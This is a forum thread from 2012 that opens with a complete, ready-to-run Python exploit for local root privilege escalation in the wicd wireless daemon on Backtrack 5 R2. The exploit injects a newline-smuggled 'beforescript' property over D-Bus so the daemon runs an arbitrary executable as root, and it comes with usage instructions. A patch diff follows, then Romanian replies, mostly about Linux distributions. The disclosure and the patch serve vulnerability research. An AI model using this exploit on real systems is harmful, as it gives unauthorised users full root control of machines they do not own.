Backtrack 5 R2 wicd Privilege Escalation

April 11, 2012

#!/usr/bin/python
#wicd 0day exploit discovered on 4.9.12 by InfoSec Institute student
#For full write up and description go to http://www.infosecinstitute.com/courses/ethical_hacking_training.html
import sys
import os
import time
import getopt

try: from wicd import dbusmanager
except: print "[!] WICD Error: libraries are not available. Is WICD installed?"; sys.exit(0)

class Error(Exception):
  def __init__(self, error):
    self.errorStr=error

  def __str__(self):
    return repr(self.errorStr)


class Wicd():
  wireless=None
  daemon=None
  versionString=None
  def __init__(self):
    try: 
      dbusmanager.connect_to_dbus()
      dbusInterfaces  = dbusmanager.get_dbus_ifaces()
      self.wireless    = dbusInterfaces["wireless"]
      self.daemon    = dbusInterfaces["daemon"]
    except: 
      raise Error("Daemon is not running")
    self.versionString = self.daemon.Hello()

  def versionLessThan(self, version):
    if int(self.versionString.replace(".",""))<=version:
      return True
    else:
      return False


class Exploit():

  def __init__(self, wicd, scriptPath):
    self.wicd = wicd
    self.scriptPath = scriptPath

  def getNets(self):
    self.wicd.wireless.Scan(True)
    nets = self.wicd.wireless.GetNumberOfNetworks()
    while nets < 1:
      self.wicd.wireless.Scan(True)
      nets = self.wicd.wireless.GetNumberOfNetworks()
    for net in range(nets):
      yield net

  def exploit(self):

    for net in self.getNets(): pass # Priming scan.

    try:
      self.wicd.wireless.SetWirelessProperty(0, "beforescript = "+ self.scriptPath +"\nrooted", "true")
    except:
      raise Error("Unable to exploit (SetWirelessProperty() failed.)")

    try:
      self.wicd.wireless.SaveWirelessNetworkProperty(0, "beforescript = "+ self.scriptPath +"\nrooted")
    except:
      raise Error("Unable to exploit (SetWirelessProperty() failed.)")

    propertyKey  = 'bssid' # Could be essid, or any other identifiable wireless property
    vulnIdentifier  = self.wicd.wireless.GetWirelessProperty(0, propertyKey) 

    # TODO: Does this need a try construct?
    self.wicd.wireless.ReloadConfig()

    for net in self.getNets(): # Implicit, but required re-scan.
      if self.wicd.wireless.GetWirelessProperty(net, propertyKey) == vulnIdentifier:
        self.wicd.wireless.ConnectWireless(net)
        return True
    raise Error("Unable to exploit (Lost the network we were using)")


def usage():
  print "[!] Usage:"
  print "  ( -h, --help ):"
  print "    Print this message."
  print "  ( --scriptPath= ): Required, executable to run as root."
  print "    --scriptPath=/some/path/to/executable.sh"

def main():
  print "[$] WICD =< 1.7.0Day"
  try:
    opts, args = getopt.getopt(sys.argv[1:], "h", ["help", "scriptPath="])
  except getopt.GetoptError, err:
    # Print help information and exit:
    print '[!] Parameter error:' + str(err) # Will print something like "option -a not recognized"
    usage()
    sys.exit(0)

  scriptPath=None

  for opt, arg in opts:
    if opt in ("-h", "--help"):
      usage()
      sys.exit(0)
    elif opt =="--scriptPath":
      scriptPath=arg
    else:
      # I would be assuming to say we'll never get here.
      print "[!] Parameter error."
      usage()
      sys.exit(0)

  if not scriptPath:
    print "[!] Parameter error: scriptPath not set."
    usage()
    sys.exit(0)

  try:
    wicd = Wicd()
  except Error as error:
    print "[!] WICD Error: %s" % (error.errorStr)
    exit(0)
  print "[*] WICD Connection Initialized! (Version: %s)" % (wicd.versionString)

  if not wicd.versionLessThan(171): 
    print "[!] WICD Warning: version print exceeds 1.7.1: Trying anyhow."

  exploit = Exploit(wicd, scriptPath)

  print "[*] Attempting to exploit:"

  try:
    exploit.exploit()
  except Error as error:
    print "[!] Exploit Error: %s" % (error.errorStr)
    exit(0)
  print "[*] Exploit appears to have worked."

# Standard boilerplate to call the main() function to begin
# the program.
if __name__=='__main__':
  main()




==========================================

PATCH:

- --- _wicd-daemon.py   2012-04-09 16:31:19.000000000 -0400
+++ wicd-daemon.py      2012-02-02 11:38:26.000000000 -0500
@@ -945,30 +945,6 @@
        self._scanning = False
        self.LastScan = []
        self.config = ConfigManager(wireless_conf, debug=debug)
- -
- -        #Using a dict to avoid repitition.
- -        self._validProperties = {
- -            'bssid':None,
- -            "essid":None,
- -            "hidden":None,
- -            "channel":None,
- -            "mode":None,
- -            "enctype":None,
- -            "encryption_method":None,
- -            "key":None,
- -            "automatic":None,
- -            "ip":None,
- -            "netmask":None,
- -            "broadcast":None,
- -            "gateway":None,
- -            "use_static_dns":None,
- -            "use_global_dns":None,
- -            "dns1":None,
- -            "dns2":None,
- -            "dns3":None,
- -            "use_settings_globally":None,
- -            "has_profile":None
- -}

    def get_debug_mode(self):
        return self._debug_mode
@@ -1088,7 +1064,7 @@
    def SetWirelessProperty(self, netid, prop, value):
        """ Sets property to value in network specified. """
        # We don't write script settings here.
- -        if (prop.strip() not in self._validProperties):
+        if (prop.strip()).endswith("script"):
            print "Setting script properties through the daemon is not" \
                  + " permitted."
            return False

SirGod · April 11, 2012

http://www.backtrack-linux.org/forums/showthread.php?t=49411

Cititi ce zice muts.

pr00f · April 11, 2012

S?-l ia naiba de RC2, nu-i merge conectarea la wireless pe adrese protejate cu WEP.

pyth0n3 · April 11, 2012

Backtrack este destinat sa ruleze din LiveCD nefiind un sistem operativ stabil pentru a fi instalat.Exista diverse alte sisteme operative care pot fi folosite pentru acest scop.Problem solved.

co4ie · April 12, 2012

Zice bine Muts ... Nu este de competenta echipei Backtrack sa faca/aplice un patch la un produs care nu este al lor ! Probabil exploitul pt Wicd este pentru toate distributiile dar a fost scos in fata doar pt ca este default in Backtrack !

@pyth0n3: Functioneaza destul de bine ca si OS instalat ... Eu nu am avut probleme pana acum cu el si in afara de stabilitatea conectiunii la wifi (wep/wpa) eu nu am avut nici cea ai mica problema cu el !

Cheater · April 12, 2012

Eh bt, are multe gauri, poate ne jucam la defcamp cu asta ;))

pyth0n3 · April 12, 2012

@pyth0n3: Functioneaza destul de bine ca si OS instalat ... Eu nu am avut probleme pana acum cu el si in afara de stabilitatea conectiunii la wifi (wep/wpa) eu nu am avut nici cea ai mica problema cu el !

Nu am zis ca nu functioneaza dar nu e ceea ce pare sau cel putin de cand nu mai e Slackware ,

Backtrack == Ubuntu , vine numit backtrack doar pentru un suite de tool-uri pe care le-au pus deasupra

Au trecut de la Slackware la Ubuntu deoarece nu ar fi avut un mare success avand in vedere faptul ca multi nu ar fi fost in grad sa instaleze un Slackware in schimb ubuntu e foarte usor de instalat si oricare poate avea backtrack (asa creste numele),Avand in vedere faptul ca nu e facut ca sa fie folosit ca un sistem de baza e ok , atata timp cat il folosesti din LiveCD .Evident se poate instala dar nu e definit ca un sistem de baza .As fi preferat slackware , de aceea eu nu folosesc backtrack (Asta e parerea mea)

Edited April 12, 2012 by pyth0n3

vladimir · April 12, 2012

pyth0n3 linux, ubuntu este cel mai bun, si nu te uita dupa nume, de back track 5.r2 sau precum e fedora sau mandrila, si asa mai departe,ca e vorba de reclama, folositi ubuntu, e si mai bun ca back track, ceea ce ai in back track poti pune in ubuntu.in plus back track, nu numai live cd, si instalat bine facuta bine partitia, dupa aia ruleaza bine, dar eu tot raman cu ubuntu.

co4ie · April 12, 2012

@vladimir: Vorbesti aiurea ... Backtrack este 95% Ubuntu si "vine numit backtrack doar pentru suitele de tool-uri instalate " dupa cum a precizat Pythone ! BTW se numeste Mandriva ... Si nu poti spune ca Ubuntu este cea mai buna distributie doar pentru ca iti place tie sau ca toti copii pot da clickuri si cred ei ca stiu linux !Intradevar Ubuntu are parte de cel mai bun suport la ora actuala dar daca ai probleme in loc sa incerci sa le rezolvi fugi repede la nenea gogu si dai copy/paste de pe forumuri !! Cea mai buna distributie este cea cu care lucrezi tu personal cel mai bine .. Si asta o sa iti spuna orice sysadmin cat de cat competent !

@pythone: sunt sigur ca cei care folosesc Backtrack exact pentru ceea ce a fost creat stiu/"sunt in stare" sa instaleze Slackware ... Cel mai probabil alegerea lor a fost facuta pentru popularitatea distributiei si pentru ca 99% din persoanele care stiu sa lucreze in astfel de medii se simt cat de cat confortabil cu Ubuntu !

Edited April 12, 2012 by co4ie

pyth0n3 · April 12, 2012

pyth0n3 linux, ubuntu este cel mai bun, si nu te uita dupa nume,

Singurele distro Linux despre care putem vorbi si pune in confrunt intre ele sunt: Debian,RedHat,Slackware,Suse, restul sunt doar derivate , Ubuntu e un derivat si nu il voi pune in confrunt cu nici una din distributiile de mai sus.

Eu cand voi vorbi de Linux ma voi referi doar la 4 distributii iar cand ma voi referi la derivate voi specifica cine este tatal.

@pythone: sunt sigur ca cei care folosesc Backtrack exact pentru ceea ce a fost creat stiu/"sunt in stare" sa instaleze Slackware ...

In privinta asta nu am nici un dubiu, ma refeream la final users.Sunt mai multi fani Ubuntu si e mai usor de aceea au ales ca suit-ul de tool-uri sa fie in ubuntu.Eu as fi preferat sa ramana o distributie pura ca Slackware .(Asta e doar una din parerile mele)Ei au facut ceea ce au crezut mai bine pentru final users.

Oricum e destinat pentru pentesting LiveCD dar poate fi si instalat evident.

Edited April 12, 2012 by pyth0n3

Nytro · April 12, 2012

https://www.secmaniac.com/blog/2012/04/12/disallowing-infosec-institute-to-leverage-set/

backdoor · April 18, 2012

Interesanta descoperire. Pt cei care stiu cu ce se manaca backtrack : cum te conectezi la un backtrack prin retea cand sigurul serviciu este postgresql cu bind 127.0.0.1 ?

Cat despre disctutia offtopic de mai sus: Ce conteaza pe ce OS au pus utilitarele ? Probabil ca au ales uBuntu tocmai pt ca kernelul e compilat cu full support pentru cam tot ce misca networking/video/sound .

Sign In

Backtrack 5 R2 wicd Privilege Escalation

Recommended Posts

Guest expl0iter

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Join the conversation